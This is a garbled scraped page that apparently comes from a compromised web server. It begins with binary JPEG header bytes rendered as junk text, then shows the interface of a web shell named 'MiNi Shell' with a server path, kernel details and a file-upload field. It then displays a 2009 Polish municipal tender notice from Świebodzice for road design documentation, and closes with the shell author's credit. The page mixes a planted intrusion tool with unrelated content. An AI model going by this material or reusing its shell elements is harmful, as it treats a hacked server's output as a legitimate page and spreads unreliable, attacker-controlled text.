JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090430/129722-N-2009.html

<p class="kh_header"><b>Świebodzice: Wykonanie dokumentacji budowlano - wykonawczej i kosztorysowej wraz ze specyfikacją techniczną wykonania i odbioru robót oraz pozwoleniem na budowę dla zadania pn.

 BUDOWA DRÓG I CHODNIKÓW WRAZ Z UZBROJENIEM NA TERENIE AKTYWIZACJI GOSPODARCZEJ PRZY UL. STRZEGOMSKIEJ - PRZEMYSŁOWEJ.</b><br>
<b>Numer ogłoszenia: 129722 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świebodzice , ul. Rynek 1, 58-160 Świebodzice, woj. dolnośląskie, tel. 074 6669543, faks 074 6669509.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swiebodzice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji budowlano - wykonawczej i kosztorysowej wraz ze specyfikacją techniczną wykonania i odbioru robót oraz pozwoleniem na budowę dla zadania pn.

 BUDOWA DRÓG I CHODNIKÓW WRAZ Z UZBROJENIEM NA TERENIE AKTYWIZACJI GOSPODARCZEJ PRZY UL. STRZEGOMSKIEJ - PRZEMYSŁOWEJ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres opracowania obejmuje:

1)	pozyskanie aktualnych podkładów geodezyjnych niezbędnych do opracowania dokumentacji i uzyskania pozwolenia na budowę,
2)	wykonanie  niezbędnych do realizacji zadania badań, raportów, ekspertyz itp..
3)	sporządzenie projektu  budowlano - wykonawczego na odbudowę nawierzchni drogi wojewódzkiej Nr 374 dla miejsca ingerencji w nią w związku z realizacją uzbrojenia terenu będącego przedmiotem opracowania, projekt należy wykonać w ilości 6 egz. w formie pisemnej oraz 1 egz. w formie elektronicznej w formacie PDF
4)	 sporządzenie projektów budowlanych, wraz z niezbędnymi opiniami i uzgodnieniami łącznie z uzyskaniem decyzji o pozwoleniu na budowę, projekty budowlane należy wykonać w ilości 6 egz. w formie pisemnej oraz 1 egz. w formie elektronicznej w formacie PDF. Zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 ( Dz. U. Nr 120 poz. 1133 z 2003 i Dz. U. Nr 201 poz. 1239 z 2008 r.)
5)	sporządzenie projektów wykonawczych uzupełniających i uszczegóławiających projekty budowlane w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego i realizacji robót, projekty wykonawcze należy wykonać w ilości 6 egz. w formie pisemnej oraz 1 egz. w formie elektronicznej PDF. Zgodnie z rozporządzeniem Ministra Infrastruktury (Dz. U. Nr 202 poz. 2072 z 2004 r. z późn. zmianami)
6)	sporządzenie projektu czasowej i stałej organizacji  ruchu projekty  należy wykonać w ilości 4 egz. w formie pisemnej oraz 1 egz. w formie elektronicznej w formacie PDF
7)	sporządzenie specyfikacji technicznej wykonania i odbioru robót budowlanych - w ilości 4 egzemplarzy w formie pisemnej oraz 1 egz. w formie elektronicznej w formacie PDF. Zgodnie z rozporządzeniem Ministra Infrastruktury ( Dz. U. Nr 202 poz. 2072 z 2004 r. z późn zmianami)
8)	sporządzenie przedmiarów robót - w ilości 4 egzemplarzy w formie pisemnej oraz 1 egz. w formie elektronicznej w formacie PDF. Zgodnie z rozporządzeniem Ministra Infrastruktury ( Dz. U. Nr 130 poz. 1389 z 2004 r.)
9)	sporządzenie kosztorysów inwestorskich - w ilości 3 egzemplarzy w formie pisemnej. Zgodnie z rozporządzeniem Ministra Infrastruktury ( Dz. U. Nr 130 poz. 1389 z 2004 r.)
10)	sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia /BIOZ/ - w ilości    3 egzemplarzy w formie pisemnej oraz 1 egz. w formie elektronicznej w formacie PDF
11)	sporządzenie zbiorczego zestawienia kosztów - w ilości 2 egz. w formie pisemnej.

3.2. Z zakresu opracowania Zamawiający wyłącza  opracowania dokumentacji na sieć teletechniczną, sieć gazową i sieć energetyczną. Projektant przewidzi jedynie miejsce ich prowadzenia uzgodnione pisemnie z gestorami tych mediów.

3.3.Dokumentację należy wykonać na podstawie Programu funkcjonalno-użytkowego(stanowiący załącznik do SIWZ ) - pierwszy obszar realizacyjny .

ZALECA SIĘ ZAINTERESOWANYM WYKONAWCOM DOKONANIE WIZJI LOKALNEJ TERENÓW OBJĘTYCH ZAKRESAMI OPRACOWAŃ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają niżej podane warunki:

5.1 Nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych.

5.2. Posiadają niezbędną wiedzę i doświadczenie oraz uprawnienia  w      następujących specjalnościach: 
1.)Instalacyjna  w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych
2.)Drogowej

5.3. Posiadają sytuację ekonomiczno-finansową zapewniającą wykonanie zamówienia.
W/w warunki zostaną uznane za spełnione, jeżeli Wykonawca złoży kompletne dokumenty, o których mowa w punkcie 6 niniejszej specyfikacji.

6.Oświadczenia i dokumenty, jakie muszą dostarczyć Wykonawcy w celu          potwierdzenia spełniania warunków udziału w postępowaniu:

6.1.Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w punkcie   5.1. niniejszej specyfikacji muszą być:                                    

a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert.

b) Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert.

c) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym  w art.24 ust.1pkt. 4-8 ustawy Prawo zamówień publicznych wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

d) Złożona zgodna z załączonym wzorem oferta zał. Nr 1 do niniejszej SIWZ i podpisana przez uprawnionych do składania oświadczeń woli w imieniu Wykonawcy .

6.2. Dokumentami potwierdzającymi spełnianie warunku udziału w postępowaniu  o którym mowa w punkcie 5.2. niniejszej  specyfikacji muszą być: 

a) Wykaz osób -zał. Nr 2 do SIWZ  które będą uczestniczyć  w wykonywaniu zamówienia oraz posiadane uprawnienia w specjalnościach wymienionych w punkcie 5.2. wraz z potwierdzoną kopią posiadanych uprawnień dla w/w osób, określonych przepisami Prawa budowlanego - zał. Nr 2 do SIWZ .

b) Zaświadczenie z właściwej Izby Samorządu Zawodowego dla w/w osób, potwierdzające ich przynależność do Izby oraz posiadanie wymaganego ubezpieczenia od odpowiedzialności cywilnej, aktualnego na dzień składania ofert. Zamawiający dopuszcza, jako dokument równoważny, złożenie nieaktualnego zaświadczenia z w/w Izby oraz dowodu dokonania należnych składek, z którego wynika, że są one opłacone na dzień składania ofert.

c) Wykaz podwykonawców i zakresy powierzanych im do wykonania prac.

d) Wykaz zrealizowanych zamówień - zał. Nr 4 do SIWZ wykonanych dokumentacji projektowych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, odpowiadających rodzajowi opracowania będącym przedmiotem niniejszego zamówienia (min. dwa zadania) o cenach brutto  każde nie mniejszej  niż 350 tys. zł brutto.
 e) Dokumenty potwierdzające , że zamówienia wymienione w wykazie zostały wykonane należycie np. referencje , świadectwa

6.3. Dokumentami potwierdzającymi spełnianie warunku udziału w postępowaniu o którym mowa w punkcie 5.3. niniejszej  specyfikacji muszą być: 

a) Złożona zgodna z załączonym wzorem oferta zał. Nr 1 do niniejszej SIWZ i podpisana przez uprawnionych do składania oświadczeń woli w imieniu Wykonawcy 

b) Dokument potwierdzający ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności.(dotyczy podmiotów gospodarczych).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zbiorcze zestawienie - wszystkich wymaganych przez Zamawiającego dokumentów

l.p.	Nazwa (rodzaj) dokumentu
1	Formularz oferty - zał. nr 1 do SIWZ

2	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji 
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji 
działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
3	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału 
Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
potwierdzających odpowiednio, że dostawca lub wykonawca nie zalega z opłacaniem podatków, 
opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane 
prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości
 wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem 
terminu składania ofert
4	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
(członkowie zarządu, prokurenci lub właściciele w przypadku podmiotów prowadzących działalność 
gospodarczą na podstawie wpisu do ewidencji działalności gospodarczej)
5	Wykaz zrealizowanych zamówień - zał. Nr 4 do SIWZ wykonanych dokumentacji projektowych 
w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, odpowiadających 
rodzajowi opracowania będącym przedmiotem niniejszego zamówienia (minimum  dwa zadania)
o cenach brutto  każde nie mniejszej niż 350 tys.zł.
6	Wykaz osób i dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają 
wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
zgodnie z p 6.2 pp. a i b SIWZ- Zał. nr. 2 do SIWZ

7	Wykaz podwykonawców i zakresy powierzanych im do wykonania prac. Zał. Nr3 do SIWZ
8	Polisa a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest 
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. (dotyczy podmiotów gospodarczych)
9	Umowa regulująca współpracę podmiotów występujących wspólnie oraz pełnomocnictwo
 dla reprezentanta z określeniem zakresu pełnomocnictwa oraz oświadczenia każdego ze wspólników , że spełnia warunki udziału w postępowaniu określone w art. 22 ust.1 p.1 - 3 i nie podlega wykluczeniu  na podstawie art. 24  ustawy  Prawo zamówień publicznych- jeżeli taka sytuacja występuje
10	Podpisany na każdej stronie wzór umowy - zał. nr 5 do SIWZ

6.5. Wszystkie w/w dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez  uprawnionych do składania oświadczeń woli w imieniu Wykonawcy.

6.6. Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej), to do oferty należy dołączyć stosowne pełnomocnictwo. 

6.7.Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

6.8. W przypadku składania oferty wspólnej przez kilku przedsiębiorców, każdy ze wspólników musi złożyć dokumenty wymienione w tabeli p.2, 3 , 4  a pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników oraz oświadczenia każdego ze wspólników, że spełnia warunki udziału w postępowaniu określone w art. 22 ust.1 p.1 - 3 i nie podlega wykluczeniu  na podstawie art. 24  ustawy  Prawo zamówień publicznych.
Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. 
          
      6.9. Wykonawca z siedzibą poza terytorium Polski
                                                                          
a). zamiast dokumentów, o których mowa w punktach 3, 4,  tabeli składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę, lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości,
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
b). zamiast dokumentów, o których mowa w punkcie 5 tabeli składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punktach 3,4,5, tabeli, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.swiebodzice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD MIASTA 
RYNEK 1
58-160 ŚWIEBODZICE.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2009 godzina 10:00, miejsce: URZĄD MIASTA 
RYNEK 1
58-160 ŚWIEBODZICE
 (sekretariat pok. Nr 10).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com